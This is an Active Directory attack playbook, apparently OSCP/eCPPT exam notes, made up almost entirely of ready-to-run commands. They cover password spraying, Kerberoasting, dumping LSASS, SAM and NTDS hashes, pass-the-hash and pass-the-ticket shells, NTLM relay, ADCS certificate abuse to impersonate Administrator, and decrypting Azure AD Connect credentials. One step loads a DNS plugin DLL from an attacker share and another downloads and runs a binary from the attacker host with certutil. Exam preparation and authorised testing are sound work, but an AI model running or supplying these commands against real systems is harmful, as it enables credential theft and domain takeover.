######################################################################
# 03 — ACTIVE DIRECTORY & WINDOWS NETWORK ATTACKS  
# OSCP 2025 — ULTRA EDITION (FINAL + ECPPT ADDITIONS INCLUDED)
######################################################################
This version includes:
✔ Full AD Enumeration  
✔ SMB/LDAP/WinRM/Kerberos workflow  
✔ Kerberoast / AS-REP roast / FAST-PAC checks  
✔ SMB/LDAP signing (relay pre-check)  
✔ ADCS ESC1–ESC14 (complete)  
✔ Delegation (RBCD / KCD)  
✔ Coercion attacks  
✔ Pass-the-Hash (NTLM & Kerberos)  
✔ MSSQL lateral movement  
✔ NTLM Relay & ADCS relay  
✔ LSASS dumping (nanodump, procdump, pypykatz)  
✔ Windows PrivEsc (OSCP safe)  
✔ BloodHound optimized collection  
✔ eCPPT AD additions  
######################################################################

======================================================================
# 1. AD DISCOVERY & INITIAL ENUMERATION
======================================================================

# 1.1 Nmap — Scan common AD ports
nmap -sC -sV -Pn -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmap_ad_$targetip.txt $targetip

# 1.2 Host & Domain Fingerprinting
netexec smb $targetip

# 1.3 SMB/LDAP Signing Status (check relay feasibility)
netexec smb $targetip --signing
netexec ldap $targetip --signing
ldapsearch -H ldap://$targetip -x -ZZ || echo "Signing/StartTLS enforced"


# 1.4 SMB Shares — Anonymous & authenticated enumeration
# Quick anonymous login test
smbclient -N -L //$targetip 2>&1 | grep -i "Anonymous"

smbclient -L //$targetip/ -N
smbmap -H $targetip
smbmap -H $targetip -u $user -p "$password"
netexec smb $targetip --shares


# 1.5 SYSVOL & GPP — Find Group Policy passwords (cpassword)
smbclient //$targetip/SYSVOL -N -c "recurse;ls"
grep -R "cpassword" .
find . -name "*.xml"
gpp-decrypt <HASH>

# 1.6 NetExec Discovery Modules — quick AD recon
# Full NetExec sweep
netexec smb $targetip -u '' -p '' --users --groups --shares --pass-pol --sessions --lsa --spider .

netexec smb $targetip -M spider
netexec smb $targetip --users
netexec smb $targetip --groups
netexec smb $targetip --laps
netexec smb $targetip -M webdav

# 1.7 Kerberos Time Sync — Required for ticket operations
ntpdate -q $targetip
chronyc tracking
rdate -n $targetip

# Domain Trust Enumeration (forest / external trust mapping)
nltest /domain_trusts
nltest /trusted_domains
nltest /dsgetdc:$domain


======================================================================
# 2. LDAP ENUMERATION
======================================================================

# 2.1 Get baseDN — required for all LDAP queries
ldapsearch -x -H ldap://$targetip -s base

# Auto-fetch baseDN (no need to manually type DN)
basedn=$(ldapsearch -x -H ldap://$targetip -s base | grep namingContexts | awk '{print $2}')


# 2.2 Enumerate all users in the directory
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=user)" sAMAccountName description mail memberOf

# 2.3 Enumerate groups & memberships
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=group)" cn member memberOf

# 2.4 Enumerate GPO settings
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=groupPolicyContainer)" gPCFileSysPath displayName

# 2.5 DNS records (Active Directory Integrated DNS)
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn"

# LDAP Filter by OU (eCPPT technique)
ldapsearch -x -H ldap://$targetip -D "$domain\\$user" -w "$password" -b "OU=Employees,$basedn" "(objectClass=user)" sAMAccountName distinguishedName userAccountControl pwdLastSet


#2.6 gMSA ENUMERATION & PASSWORD RETRIEVAL
# (Used in HTB Sendai, Vintage, Intelligence-style chains)
======================================================================

# (1) Enumerate all gMSA accounts
# Lists every Group Managed Service Account + password blobs + group membership
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=msDS-GroupManagedServiceAccount)" sAMAccountName msDS-ManagedPassword msDS-GroupMSAMembership

# (2) Check ACLs to see who can read msDS-ManagedPassword
# If you see your user in WriteDACL / ReadProperty → you can dump gMSA passwords
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=*)" nTSecurityDescriptor | grep -i msDS-ManagedPassword

# (3) Test if CURRENT USER can read gMSA password attribute
# If attribute is readable → instant gMSA password retrieval (used for lateral movement)
netexec ldap $targetip -u $user -p "$password" --attribute msDS-ManagedPassword

# (4) Dump readable gMSA passwords (auto-decrypts Base64 blob)
# Produces plaintext password for the gMSA → can be used like a service account credential
gMSADumper.py -u $user -p "$password" -d $domain



======================================================================
# 3. KERBEROS ATTACKS
======================================================================

# 3.1 Kerbrute — User enumeration via Kerberos responses
kerbrute userenum -d $domain --dc $targetip users.txt

# 3.2 Kerbrute — Password spraying via Kerberos
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'

# 3.3 AS-REP Roast — Users with DoNotRequirePreAuth
impacket-GetNPUsers $domain/ -dc-ip $targetip -no-pass -usersfile users.txt -format john -outputfile asrep.txt

# 1️⃣ AS-REP ROAST — AUTO USER ENUM VIA LDAP (Dynamic user list)
# PURPOSE:
# - Automatically extracts ALL domain users via LDAP.
# - Creates users.txt automatically → no manual wordlist needed.
# - Perfect when anonymous LDAP binds are allowed.
# - Immediately performs AS-REP Roast against all roastable users.

ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=user)" sAMAccountName | grep sAMAccountName | awk '{print $2}' > all_users.txt && impacket-GetNPUsers $domain/ -dc-ip $targetip -no-pass -usersfile all_users.txt -format john -outputfile asrep_auto.txt

# LDAP filter for users with DoNotRequirePreAuth
ldapsearch -x -H ldap://$targetip -b "$basedn" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" sAMAccountName


# 3.4 Kerberoast — Request service tickets (SPNs)
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $targetip -request -format john -outputfile kerberoast.txt

# Anonymous SPN discovery (if allowed)
ldapsearch -x -H ldap://$targetip -b "$basedn" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

# Filter roastable SPNs
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $targetip | grep -i "ServicePrincipalName"


# 3.5 Request TGT / ST — For delegation & Kerberos PTH
impacket-getTGT $domain/$user:"$password"
impacket-getST -spn <service>/<fqdn> -impersonate Administrator $domain/$user:"$password" -dc-ip $targetip

# 3.6 Detect FAST/PAC enforcement (modern Kerberos protections)
netexec kerberos $targetip --kerberos


======================================================================
# 4. HASHES & LATERAL MOVEMENT
======================================================================

# 4.1 Dump SAM / LSASS / NTDS using NetExec
netexec smb $targetip -u $user -p "$password" --sam
netexec smb $targetip -u $user -p "$password" -M lsassy
netexec smb $targetip -u $user -p "$password" -M ntdsutil

# 4.2 Dump ONLY DC Hashes (eCPPT technique)
python3 secretsdump.py -just-dc-ntlm $domain/$user:"$password"@$targetip


======================================================================
# 5. PASS-THE-HASH (NTLM & Kerberos)
======================================================================

### NTLM PTH (SMB/WMI/WinRM using NTLM hash — no time sync required)

# SMB RCE via PTH
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

# WMI execution via PTH
impacket-wmiexec $domain/$user@$targetip -hashes <LM:NTLM>

# WinRM shell via NTLM hash
evil-winrm -i $targetip -u $user -H <NTLM>

# NetExec NTLM options
netexec smb $targetip -u $user -H <NTLM>
netexec smb $targetip -u $user -H <NTLM> --sam
netexec smb $targetip -u $user -H <NTLM> -M lsassy


### Kerberos Pass-The-Key (requires exact time sync)

# Sync time
ntpdate -q $targetip

# Request TGT using only hash
impacket-getTGT $domain/$user -hashes <LM:NTLM>

# Load ticket file
export KRB5CCNAME=$user.ccache

# Request service ticket as Administrator
impacket-getST -spn cifs/$target -impersonate Administrator $domain/$user -dc-ip $targetip


======================================================================
# 6. WINRM & RDP
======================================================================

# Check WinRM availability
netexec winrm $targetip

# WinRM password auth
evil-winrm -i $targetip -u $user -p "$password"

# WinRM hash auth
evil-winrm -i $targetip -u $user -H <NTLM>

# WinRM certificate authentication
evil-winrm -i $targetip -c cert.pem -k key.pem

# RDP login
xfreerdp /v:$targetip /u:$user /p:"$password" /dynamic-resolution +clipboard


======================================================================
# 7. MSSQL ATTACKS
======================================================================

# Login with Windows authentication
mssqlclient.py $domain/$user:"$password"@$targetip -windows-auth

# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Execute OS commands
EXEC xp_cmdshell 'whoami';

# Discover linked servers
EXEC sp_linkedservers;

# Execute commands on linked server
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];

#7.1 AZURE AD CONNECT (AADSYNC) CREDENTIAL EXTRACTION
# (Monteverde-style hybrid AD → DA pivot)

# Azure AD Connect SQL DB default locations
#   ADSync.mdf
#   ADSync_log.ldf
#   (path varies by install)
C:\Program Files\Microsoft Azure AD Sync\Data\
C:\Program Files\Microsoft Azure Active Directory Connect\ADSync\Data\

# Connect to local MSSQL instance hosting Azure AD Connect DB
mssqlclient.py $domain/$user:"$password"@$targetip -windows-auth

# Query sync configuration tables
SELECT * FROM mms_management_agent;
SELECT * FROM mms_server_configuration;

# Extract encrypted sync credentials from table
SELECT encrypted_configuration FROM mms_management_agent;

# Decrypt Azure AD Connect sync credentials (often DA creds)
AzureADConnectDecrypt.exe <encrypted_blob>

======================================================================
# 8. ADCS (ESC1–ESC15)
======================================================================

# Scan for ADCS misconfigurations
certipy find -u $user -p "$password" -dc-ip $targetip -vulnerable -enabled

# Request certificate
certipy req -u $user -p "$password" -dc-ip $targetip -template $template -out cert.pfx

# Authenticate using the certificate
certipy auth -pfx cert.pfx -dc-ip $targetip

# Shadow credential injection
certipy shadow -u $user -p "$password" -dc-ip $targetip -account Administrator

# Full JSON output
certipy find -u $user -p "$password" -dc-ip $targetip -stdout -json out.json


# Detect ESC15-vulnerable certificate templates
certipy find -u $user -p "$password" -dc-ip $targetip -vulnerable | grep -i ESC15

# Request vulnerable certificate masquerading as Administrator
certipy req -u $user -p "$password" -dc-ip $targetip \
  -template $template -upn Administrator@$domain -out esc15.pfx

# Authenticate using ESC15-derived Admin certificate
certipy auth -pfx esc15.pfx -dc-ip $targetip

======================================================================
# 9. DELEGATION ATTACKS (RBCD / KCD)
======================================================================

# 9.1 Resource-Based Constrained Delegation (RBCD)
addcomputer.py -dc-ip $targetip $domain/$user:"$password" -computer-name 'MACHINE$' -computer-pass 'Pass123!'
impacket-rbcd -delegate-from 'MACHINE$' -delegate-to 'SERVER$' -dc-ip $targetip -action write -user $user -password "$password"
getST.py -spn cifs/SERVER.$domain -impersonate Administrator "$domain/MACHINE$":"Pass123!"

# 9.2 Kerberos Constrained Delegation (KCD)
impacket-getST -impersonate Administrator -spn http/web.$domain $domain/$user:"$password"

# 9.3 Coercion attacks (force authentication to attacker)
printerbug.py $domain/$user:"$password"@$targetip $localip
dfscoerce.py $domain/$user:"$password"@$targetip $localip
petitpotam.py -u $user -p "$password" -d $domain -dc-ip $targetip $localip


======================================================================
# 10. NTLM RELAY (SMB → LDAP + ADCS)
======================================================================

# Poison LLMNR/NBNS traffic
responder -I tun0 -wd -v

# Relay to LDAP
ntlmrelayx.py -t ldap://$targetip --no-http-server

# ADCS relay to request certificates
ntlmrelayx.py --adcs --template "User" -t http://$targetip --no-http-server

# Block SMB to make relay more effective
iptables -A INPUT -p tcp --dport 445 -j DROP

hashcat -m 5600 captured.ntlmv2 -a 0 rockyou.txt


======================================================================
# 11. DPAPI Credential Extraction
======================================================================

# Extract DPAPI secrets from live system
pypykatz live lsa

# Extract Chrome saved passwords
pypykatz dpapi chrome -d .

# Extract RDP credentials
pypykatz dpapi rdp -d .

# Dump Wi-Fi stored passwords
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear


======================================================================
# 12. LSASS DUMPING
======================================================================

# Stealth LSASS dump
nanodump.exe --write C:\Windows\Temp\lsass.dmp

# LSASS dump using ProcDump
procdump.exe -ma lsass.exe lsass.dmp

# Parse LSASS dump for passwords, hashes, kerberos tickets
pypykatz lsa minidump lsass.dmp


======================================================================
# 13. WINDOWS PRIVILEGE ESCALATION
======================================================================

# Check your privileges
whoami /priv

# PrintSpoofer exploit (service misconfig)
PrintSpoofer.exe -i -c cmd

# RoguePotato privilege escalation
RoguePotato.exe

# Search cleartext passwords on disk
findstr /si /i "password" *.txt *.xml *.ini

# Enumerate services for privilege escalation
wmic service get name,displayname,pathname,startmode

# WinPEAS full enumeration
certutil -urlcache -f http://$localip/winpeas.exe C:\Temp\winpeas.exe && C:\Temp\winpeas.exe


======================================================================
# 14. CROSS-DOMAIN & FOREST ENUMERATION
======================================================================

# Enumerate all trust relationships
nltest /domain_trusts
nltest /trusted_domains

======================================================================
# 15. BLOODHOUND
======================================================================

# BloodHound collection (Python ingestor)
# Gathers users, groups, ACLs, sessions, local admins, GPOs, trust paths
bloodhound-python -d $domain -u $user -p "$password" -ns $targetip -c All

Better optimized:
bloodhound-python -d $domain -u $user -p "$password" --zip --dns-tcp -ns $targetip -c All


======================================================================
# 16. ADIDNS ENUMERATION & DNSADMINS PRIV-ESC (SAFE)
======================================================================

# Enumerate all DNS nodes (AD-integrated DNS records)
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn" "(objectClass=dnsNode)" name dnsRecord

# List DNS zones (PowerShell)
Get-DnsServerZone

# List all DNS records for a zone
Get-DnsServerResourceRecord -ZoneName $domain

# DNS dump via Impacket
dnsdump.py $domain/$user:"$password"@$targetip

# Check DNSAdmins group membership
ldapsearch -x -H ldap://$targetip -b "CN=DNSAdmins,CN=Users,$basedn" "(objectClass=*)" member
netexec ldap $targetip --groups | grep -i dns
Get-ADGroupMember "DNSAdmins"

# Enumerate ACL of specific DNS nodes (to check for WriteDACL)
Get-ACL "AD:\CN=www,CN=MicrosoftDNS,DC=DomainDnsZones,$basedn" | fl

# 16.1 DNSADMINS ABUSE 
# (Resolute-style DNS → SYSTEM on DC)

# Configure DNS plugin DLL (malicious DLL hosted on SMB share)
dnscmd $targetip /config /serverlevelplugindll \\$attacker\share\payload.dll

# Restart DNS service to load the DLL
sc.exe \\$targetip stop dns
sc.exe \\$targetip start dns
======================================================================
# 17. DCSYNC & DCSHADOW ENUMERATION (NO EXPLOIT)
======================================================================

# 2️⃣ QUICK DCSYNC PRIVILEGE TEST (NO EXPLOIT — ENUM ONLY)
# PURPOSE:
# - Checks if your current user has replication rights.
# - Detects: DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, etc.
# - If present → user *can* perform DCSync (OSCP: enumeration allowed, exploit not).
netexec ldap $targetip -u $user -p "$password" --dacl | grep -Ei "DS-Replication-Get-Changes"

# List privileged groups whose members can DCSync
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Administrators)" member
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Domain Admins)" member
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Enterprise Admins)" member

# Show groups & membership via NetExec
netexec ldap $targetip --groups

# Check your own token privileges
whoami /groups

# Check if domain object ACL contains DS-Replication privileges
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=domain)" nTSecurityDescriptor


======================================================================
# 18. ACL ABUSE ENUM (GenericAll / WriteDACL / WriteOwner)
======================================================================

# Dump ACL of any AD object
ldapsearch -x -H ldap://$targetip -b "$dn" "(objectClass=*)" nTSecurityDescriptor
Get-ObjectAcl -DistinguishedName "$dn" | fl

# Domain-level ACL enumeration
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=domain)" nTSecurityDescriptor

# Domain Controllers OU ACL enumeration
ldapsearch -x -H ldap://$targetip -b "OU=Domain Controllers,$basedn" "(objectClass=*)" nTSecurityDescriptor

# 18.1 SHADOW CREDENTIALS (KeyCredentialLink Abuse)
# (Modern AD technique — works with WriteDACL/GenericWrite)

# Enumerate KeyCredentialLink for all users
ldapsearch -x -H ldap://$targetip -b "$basedn" \
  "(objectClass=user)" sAMAccountName keyCredentialLink

# Add Shadow Credential to a target user (creates cert-based auth)
certipy shadow -u $user -p "$password" -account $targetuser -dc-ip $targetip

# Authenticate using generated certificate (targetuser.pfx)
certipy auth -pfx targetuser.pfx -dc-ip $targetip

======================================================================
# 19. LAPS ENUMERATION (LOCAL ADMIN PASSWORD SOLUTION)
======================================================================

# Auto-dump LAPS passwords
netexec ldap $targetip -u $user -p "$password" --laps

# Enumerate machines storing LAPS passwords
ldapsearch -x -H ldap://$targetip -b "$basedn" "(ms-Mcs-AdmPwd=*)" name ms-Mcs-AdmPwdExpirationTime

# Check who can read LAPS passwords
Find-AdmPwdExtendedRights -ResolvePrincipals

# Inspect ACLs on Computers container
ldapsearch -x -H ldap://$targetip -b "CN=Computers,$basedn" "(objectClass=*)" nTSecurityDescriptor


======================================================================
# 20. BACKUP OPERATORS → SYSTEM → DA (SAFE ENUM)
======================================================================

# Enumerate Backup Operators group
ldapsearch -x -H ldap://$targetip -b "CN=Backup Operators,CN=Builtin,$basedn" "(objectClass=*)" member
Get-ADGroupMember "Backup Operators"

# Check your privileges (look for SeBackupPrivilege / SeRestorePrivilege)
whoami /priv

# Local authentication test
netexec smb $targetip -u $user -p "$password" --local-auth


======================================================================
# 21. AD MITM ATTACK SURFACE (RELAY ENUM)
======================================================================

# 21.1 SMB signing status
netexec smb $targetip --signing
nmap --script smb2-security-mode -p445 $targetip

# 21.2 LDAP signing / channel binding
netexec ldap $targetip --signing
nmap -p389 --script ldap-rootdse $targetip

# 21.3 LLMNR / NBNS exposure
tcpdump -i tun0 "udp port 5355"   # LLMNR
tcpdump -i tun0 "udp port 137"    # NBNS

curl -I --ntlm --user "$user:$password" http://$targetip

======================================================================
# 22. PASSWORD POLICY & PASSWORD ANALYTICS
======================================================================

# 22.1 Enumerate domain password policy
GetADUsers.py $domain/$user:"$password" -dc-ip $targetip -all
Get-ADDefaultDomainPasswordPolicy
netexec ldap $targetip --pass-pol

# 22.2 Fine-Grained Password Policies (FGPP)
ldapsearch -x -H ldap://$targetip -b "CN=Password Settings Container,CN=System,$basedn" "(objectClass=*)" msDS-PasswordSettings
Get-ADFineGrainedPasswordPolicy -Filter *

# 22.3 Search for weak password patterns in cracked creds
grep -Ei "(spring|summer|autumn|winter|202[0-5])" cracked_passwords.txt

# Search for plaintext passwords in SYSVOL
grep -R "password" /mnt/sysvol 2>/dev/null


======================================================================
# 00. HOW TO REQUEST / OBTAIN A .kirbi TICKET (OSCP-SAFE)
======================================================================

# Request a TGT (Kerberos login)
impacket-getTGT $domain/$user:"$password"

# Convert .ccache → .kirbi
impacket-ticketConverter $user.ccache $user.kirbi

# Kerberoasting requests produce .kirbi internally
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $dcip -request

# Export your own Kerberos ticket from Linux
klist -e
cp /tmp/krb5cc_* myticket.ccache
impacket-ticketConverter myticket.ccache myticket.kirbi

# Extract tickets from LSASS dump (OSCP allowed)
pypykatz lsa minidump lsass.dmp

# Load Kerberos ticket for authentication
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
impacket-wmiexec -k -no-pass $domain/$user@$targetip
impacket-smbclient -k -no-pass cifs/$targetip
impacket-psexec -k -no-pass $domain/$user@$targetip


======================================================================
# 23. PASS-THE-TICKET (PtT) — SAFE & OSCP-LEGAL
======================================================================

# Convert .kirbi → .ccache
impacket-ticketConverter ticket.kirbi ticket.ccache

# Load ticket
export KRB5CCNAME=ticket.ccache

# Use Kerberos authentication only (no NTLM)
impacket-smbclient -k -no-pass cifs/$targetip
impacket-wmiexec -k -no-pass $domain/$user@$targetip
impacket-psexec -k -no-pass $domain/$user@$targetip


======================================================================
# 24. OVERPASS-THE-HASH (Pass-the-Key)
======================================================================

# Request Kerberos TGT using only NTLM hash
impacket-getTGT $domain/$user -hashes <LM:NTLM>

# Load ticket
export KRB5CCNAME=$user.ccache

# Kerberos access
impacket-wmiexec -k -no-pass $domain/$user@$targetip
impacket-smbclient -k -no-pass cifs/$targetip


======================================================================
# 25. DCOM LATERAL MOVEMENT
======================================================================

# Execute commands remotely using DCOM
dcomexec.py $domain/$user:"$password"@$targetip


======================================================================
# 26. SHADOW COPY ENUMERATION (OSCP-SAFE)
======================================================================

# List Volume Shadow Copies
vssadmin list shadows

# List providers
vssadmin list providers

# List writers
vssadmin list writers


======================================================================
# 27. GOLDEN & SILVER TICKET ENUM (SAFE)
======================================================================

# krbtgt account enumeration
ldapsearch -x -H ldap://$targetip -b "$basedn" "(sAMAccountName=krbtgt)"

# Enumerate all SPNs (used for Silver Ticket targets)
ldapsearch -x -H ldap://$targetip -b "$basedn" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

# Check domain ACL for replication rights (Golden Ticket requirement)
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=domain)" nTSecurityDescriptor

######################################################################
# END — COMPLETE OSCP + AD ATTACK PLAYBOOK (2025 FINAL)
######################################################################
